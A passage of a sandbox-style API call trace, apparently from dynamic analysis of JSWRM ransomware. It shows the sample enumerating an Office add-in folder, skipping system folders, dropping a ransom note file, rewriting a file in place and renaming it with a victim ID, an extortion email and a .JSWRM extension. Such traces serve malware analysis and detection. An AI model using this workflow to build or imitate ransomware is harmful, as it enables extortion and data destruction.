lpString2="recovery") returned -1 [0126.534] lstrcmpiW (lpString1="fi", lpString2="perflogs") returned -1 [0126.534] lstrcmpiW (lpString1="fi", lpString2="documents and settings") returned 1 [0126.534] lstrcmpiW (lpString1="fi", lpString2="$RECYCLE.BIN") returned 1 [0126.534] lstrcmpiW (lpString1="fi", lpString2="system volume information") returned -1 [0126.534] lstrcmpiW (lpString1="fi", lpString2="msocache") returned -1 [0126.535] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0126.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0126.535] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0126.535] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0126.535] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e228 [0126.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0126.535] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\fi\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\fi\\jswrm-decrypt.hta")) returned 0xffffffff [0126.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e228 | out: hHeap=0x1e0000) returned 1 [0126.535] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.535] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.535] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0126.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x278330 [0126.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0126.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x27a100 [0126.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x278330 | out: hHeap=0x1e0000) returned 1 [0126.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0126.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e570 [0126.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0126.536] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\fi\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\fi\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0126.536] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.536] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0126.537] CloseHandle (hObject=0x314) returned 1 [0126.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e570 | out: hHeap=0x1e0000) returned 1 [0126.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27a100 | out: hHeap=0x1e0000) returned 1 [0126.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0126.537] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0126.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0126.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0126.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0126.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0126.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0126.538] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\fi\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\fi\\jswrm-decrypt.hta")) returned 0x20 [0126.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0126.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0126.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0126.538] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\fi\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff0bc27, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16783027, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x42155209, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName=".", cAlternateFileName="")) returned 0x2320c0 [0126.538] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0126.538] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff0bc27, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16783027, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x42155209, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="..", cAlternateFileName="")) returned 1 [0126.538] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0126.538] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0126.538] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42155209, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x42155209, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x42155209, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0126.538] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0126.538] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0126.538] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0126.538] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0126.538] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0126.538] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0126.538] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0126.538] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0126.538] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0126.538] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0126.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0126.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241010, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0126.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0126.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241308, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0126.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22df20 [0126.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0126.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0126.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0126.539] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x16783027, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x16783027, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16783027, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x112a, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="LocalizedStrings.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0126.539] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2=".") returned 1 [0126.539] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="..") returned 1 [0126.539] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="...") returned 1 [0126.539] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="windows") returned -1 [0126.539] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="recovery") returned -1 [0126.539] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="perflogs") returned -1 [0126.539] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="documents and settings") returned 1 [0126.539] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="$RECYCLE.BIN") returned 1 [0126.539] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="system volume information") returned -1 [0126.539] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="msocache") returned -1 [0126.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0126.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0126.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x2410d8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedStrings.xml", lpUsedDefaultChar=0x0) returned 20 [0126.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0126.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0126.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x241330, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedStrings.xml", lpUsedDefaultChar=0x0) returned 20 [0126.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dd70 [0126.540] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22df20 | out: hHeap=0x1e0000) returned 1 [0126.540] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.540] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0126.540] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\fi\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\fi\\localizedstrings.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0126.540] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=4394) returned 1 [0126.540] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1120) returned 0x278330 [0126.540] ReadFile (in: hFile=0x338, lpBuffer=0x278330, nNumberOfBytesToRead=0x1120, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e1cc*=0x1120, lpOverlapped=0x0) returned 1 [0126.542] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.542] WriteFile (in: hFile=0x338, lpBuffer=0x278330*, nNumberOfBytesToWrite=0x1120, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e1c8*=0x1120, lpOverlapped=0x0) returned 1 [0126.542] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x278330 | out: hHeap=0x1e0000) returned 1 [0126.542] CloseHandle (hObject=0x338) returned 1 [0126.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0126.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0126.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0126.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0126.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0126.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0126.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0126.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0126.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0126.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0126.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.543] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\fi\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\fi\\localizedstrings.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\fi\\LocalizedStrings.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\fi\\localizedstrings.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0126.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0126.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0126.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0126.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0126.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0126.544] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5a8a2df, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf5a8a2df, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf5a8a2df, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xd030, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Common.resources.dll", cAlternateFileName="MIE3DA~1.DLL")) returned 1 [0126.544] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2=".") returned 1 [0126.544] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="..") returned 1 [0126.544] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="...") returned 1 [0126.544] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="windows") returned -1 [0126.544] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="recovery") returned -1 [0126.544] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="perflogs") returned -1 [0126.544] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="documents and settings") returned 1 [0126.544] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.544] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="system volume information") returned -1 [0126.544] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="msocache") returned -1 [0126.544] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0126.544] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.544] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.544] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x22d0d8, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0126.544] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0126.544] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.544] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x22d260, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0126.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23dee0 [0126.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dd70 | out: hHeap=0x1e0000) returned 1 [0126.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.545] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf99462e6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf99462e6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf9992797, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x38af0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cAlternateFileName="MIDF86~1.DLL")) returned 1 [0126.545] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2=".") returned 1 [0126.545] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="..") returned 1 [0126.545] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="...") returned 1 [0126.545] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="windows") returned -1 [0126.545] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="recovery") returned -1 [0126.545] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="perflogs") returned -1 [0126.545] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="documents and settings") returned 1 [0126.545] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.545] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="system volume information") returned -1 [0126.545] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="msocache") returned -1 [0126.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0126.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0126.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x20d698, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0126.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0126.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.545] WideCharToMultiByte (in: CodePage=0xfde9, 